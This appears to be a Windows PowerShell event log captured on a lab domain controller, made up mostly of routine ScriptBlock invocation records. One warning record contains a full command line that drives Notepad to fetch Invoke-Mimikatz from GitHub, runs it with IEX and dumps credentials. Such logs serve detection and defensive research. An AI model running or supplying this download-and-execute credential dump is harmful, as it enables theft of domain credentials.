Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:35 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476464
Keywords=None
Message=Started invocation of ScriptBlock ID: 2b1c0594-18f1-414d-9b57-a1c4696f0102
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:35 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4104
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Execute a Remote Command
OpCode=On create calls
RecordNumber=1476463
Keywords=None
Message=Creating Scriptblock text (1 of 1):
{ Set-StrictMode -Version 1; $this.Exception.InnerException.PSMessageDetails }

ScriptBlock ID: 2b1c0594-18f1-414d-9b57-a1c4696f0102
Path:
06/15/2021 05:01:35 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476462
Keywords=None
Message=Started invocation of ScriptBlock ID: 5a7e1786-6735-4628-8b01-3f292a0d253e
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:35 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476461
Keywords=None
Message=Started invocation of ScriptBlock ID: 75a4c1da-ffed-42dd-8e58-2ef5e45103b6
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:35 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4104
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Execute a Remote Command
OpCode=On create calls
RecordNumber=1476460
Keywords=None
Message=Creating Scriptblock text (1 of 1):
{ Set-StrictMode -Version 1; $_.PSMessageDetails }

ScriptBlock ID: 75a4c1da-ffed-42dd-8e58-2ef5e45103b6
Path:
06/15/2021 05:01:35 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476459
Keywords=None
Message=Started invocation of ScriptBlock ID: 08c631bd-97a5-450c-a69c-c117724f842e
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:35 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476458
Keywords=None
Message=Completed invocation of ScriptBlock ID: 419a5b90-111c-45f9-b926-00f38a8055bb
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:35 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476457
Keywords=None
Message=Started invocation of ScriptBlock ID: 419a5b90-111c-45f9-b926-00f38a8055bb
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:35 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4100
EventType=3
Type=Warning
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Executing Pipeline
OpCode=To be used when an exception is raised
RecordNumber=1476456
Keywords=None
Message=Error Message = At line:1 char:8
+ [Window Title]
+        ~
Missing ] at end of attribute or type literal.

At line:1 char:9
+ [Window Title]
+         ~~~~~~
Unexpected token 'Title]' in expression or statement.
Fully Qualified Error ID = EndSquareBracketExpectedAtEndOfAttribute,Microsoft.PowerShell.Commands.InvokeExpressionCommand


Context:
        Severity = Warning
        Host Name = ConsoleHost
        Host Version = 5.1.14393.4402
        Host ID = 55a33844-cb71-45e7-8c26-7b3a6fd7b5d4
        Host Application = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe & {$url='https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f650520c4b1004daf8b3ec08007a0b945b91253a/Exfiltration/Invoke-Mimikatz.ps1';$wshell=New-Object -ComObject WScript.Shell;$reg='HKCU:\Software\Microsoft\Notepad';$app='Notepad';$props=(Get-ItemProperty $reg);[Void][System.Reflection.Assembly]::LoadWithPartialName('System.Windows.Forms');@(@('iWindowPosY',([String]([System.Windows.Forms.Screen]::AllScreens)).Split('}')[0].Split('=')[5]),@('StatusBar',0))|ForEach{SP $reg (Item Variable:_).Value[0] (Variable _).Value[1]};$curpid=$wshell.Exec($app).ProcessID;While(!($title=GPS|?{(Item Variable:_).Value.id-ieq$curpid}|ForEach{(Variable _).Value.MainWindowTitle})){Start-Sleep -Milliseconds 500};While(!$wshell.AppActivate($title)){Start-Sleep -Milliseconds 500};$wshell.SendKeys('^o');Start-Sleep -Milliseconds 500;@($url,(' '*1000),'~')|ForEach{$wshell.SendKeys((Variable _).Value)};$res=$Null;While($res.Length -lt 2){[Windows.Forms.Clipboard]::Clear();@('^a','^c')|ForEach{$wshell.SendKeys((Item Variable:_).Value)};Start-Sleep -Milliseconds 500;$res=([Windows.Forms.Clipboard]::GetText())};[Windows.Forms.Clipboard]::Clear();@('%f','x')|ForEach{$wshell.SendKeys((Variable _).Value)};If(GPS|?{(Item Variable:_).Value.id-ieq$curpid}){@('{TAB}','~')|ForEach{$wshell.SendKeys((Item Variable:_).Value)}};@('iWindowPosDY','iWindowPosDX','iWindowPosY','iWindowPosX','StatusBar')|ForEach{SP $reg (Item Variable:_).Value $props.((Variable _).Value)};IEX($res);invoke-mimikatz -dumpcr}
        Engine Version = 5.1.14393.4402
        Runspace ID = cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
        Pipeline ID = 1
        Command Name = Invoke-Expression
        Command Type = Cmdlet
        Script Name = 
        Command Path = 
        Sequence Number = 15
        User = ATTACKRANGE\administrator
        Connected User = 
        Shell ID = Microsoft.PowerShell


User Data:
06/15/2021 05:01:35 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476455
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ef05cb4-cb7b-494c-a123-b1c30e93dc68
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:35 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476454
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ef05cb4-cb7b-494c-a123-b1c30e93dc68
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:35 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476453
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ef05cb4-cb7b-494c-a123-b1c30e93dc68
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:35 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476452
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ef05cb4-cb7b-494c-a123-b1c30e93dc68
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:35 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476451
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ef05cb4-cb7b-494c-a123-b1c30e93dc68
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:35 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476450
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ef05cb4-cb7b-494c-a123-b1c30e93dc68
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:35 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476449
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ef05cb4-cb7b-494c-a123-b1c30e93dc68
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:35 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476448
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ef05cb4-cb7b-494c-a123-b1c30e93dc68
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:35 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476447
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ef05cb4-cb7b-494c-a123-b1c30e93dc68
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:35 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476446
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ef05cb4-cb7b-494c-a123-b1c30e93dc68
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:35 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4104
EventType=3
Type=Warning
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Execute a Remote Command
OpCode=On create calls
RecordNumber=1476445
Keywords=None
Message=Creating Scriptblock text (1 of 1):
{SP $reg (Item Variable:_).Value $props.((Variable _).Value)}

ScriptBlock ID: 9ef05cb4-cb7b-494c-a123-b1c30e93dc68
Path:
06/15/2021 05:01:35 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476444
Keywords=None
Message=Completed invocation of ScriptBlock ID: 1aedcd7d-cbb5-43ac-bc50-a42928241d3f
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:35 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476443
Keywords=None
Message=Started invocation of ScriptBlock ID: 1aedcd7d-cbb5-43ac-bc50-a42928241d3f
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:35 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476442
Keywords=None
Message=Completed invocation of ScriptBlock ID: 1aedcd7d-cbb5-43ac-bc50-a42928241d3f
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:35 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476441
Keywords=None
Message=Started invocation of ScriptBlock ID: 1aedcd7d-cbb5-43ac-bc50-a42928241d3f
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:35 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4104
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Execute a Remote Command
OpCode=On create calls
RecordNumber=1476440
Keywords=None
Message=Creating Scriptblock text (1 of 1):
{$wshell.SendKeys((Item Variable:_).Value)}

ScriptBlock ID: 1aedcd7d-cbb5-43ac-bc50-a42928241d3f
Path:
06/15/2021 05:01:35 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476439
Keywords=None
Message=Completed invocation of ScriptBlock ID: aaa3c223-9ea0-4e61-b498-1afc61e30dd2
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:35 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476438
Keywords=None
Message=Started invocation of ScriptBlock ID: aaa3c223-9ea0-4e61-b498-1afc61e30dd2
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:35 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476437
Keywords=None
Message=Completed invocation of ScriptBlock ID: aaa3c223-9ea0-4e61-b498-1afc61e30dd2
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:35 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476436
Keywords=None
Message=Started invocation of ScriptBlock ID: aaa3c223-9ea0-4e61-b498-1afc61e30dd2
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:35 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476435
Keywords=None
Message=Completed invocation of ScriptBlock ID: aaa3c223-9ea0-4e61-b498-1afc61e30dd2
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:35 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476434
Keywords=None
Message=Started invocation of ScriptBlock ID: aaa3c223-9ea0-4e61-b498-1afc61e30dd2
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:35 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476433
Keywords=None
Message=Completed invocation of ScriptBlock ID: aaa3c223-9ea0-4e61-b498-1afc61e30dd2
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:35 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476432
Keywords=None
Message=Started invocation of ScriptBlock ID: aaa3c223-9ea0-4e61-b498-1afc61e30dd2
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:35 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476431
Keywords=None
Message=Completed invocation of ScriptBlock ID: aaa3c223-9ea0-4e61-b498-1afc61e30dd2
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:35 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476430
Keywords=None
Message=Started invocation of ScriptBlock ID: aaa3c223-9ea0-4e61-b498-1afc61e30dd2
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:35 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476429
Keywords=None
Message=Completed invocation of ScriptBlock ID: aaa3c223-9ea0-4e61-b498-1afc61e30dd2
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:35 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476428
Keywords=None
Message=Started invocation of ScriptBlock ID: aaa3c223-9ea0-4e61-b498-1afc61e30dd2
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:35 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476427
Keywords=None
Message=Completed invocation of ScriptBlock ID: aaa3c223-9ea0-4e61-b498-1afc61e30dd2
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:35 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476426
Keywords=None
Message=Started invocation of ScriptBlock ID: aaa3c223-9ea0-4e61-b498-1afc61e30dd2
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:35 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476425
Keywords=None
Message=Completed invocation of ScriptBlock ID: aaa3c223-9ea0-4e61-b498-1afc61e30dd2
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:35 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476424
Keywords=None
Message=Started invocation of ScriptBlock ID: aaa3c223-9ea0-4e61-b498-1afc61e30dd2
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:35 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476423
Keywords=None
Message=Completed invocation of ScriptBlock ID: aaa3c223-9ea0-4e61-b498-1afc61e30dd2
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:35 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476422
Keywords=None
Message=Started invocation of ScriptBlock ID: aaa3c223-9ea0-4e61-b498-1afc61e30dd2
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:35 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476421
Keywords=None
Message=Completed invocation of ScriptBlock ID: aaa3c223-9ea0-4e61-b498-1afc61e30dd2
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:35 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476420
Keywords=None
Message=Started invocation of ScriptBlock ID: aaa3c223-9ea0-4e61-b498-1afc61e30dd2
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:35 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476419
Keywords=None
Message=Completed invocation of ScriptBlock ID: aaa3c223-9ea0-4e61-b498-1afc61e30dd2
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:35 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476418
Keywords=None
Message=Started invocation of ScriptBlock ID: aaa3c223-9ea0-4e61-b498-1afc61e30dd2
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:35 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476417
Keywords=None
Message=Completed invocation of ScriptBlock ID: aaa3c223-9ea0-4e61-b498-1afc61e30dd2
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:35 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476416
Keywords=None
Message=Started invocation of ScriptBlock ID: aaa3c223-9ea0-4e61-b498-1afc61e30dd2
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:35 PM
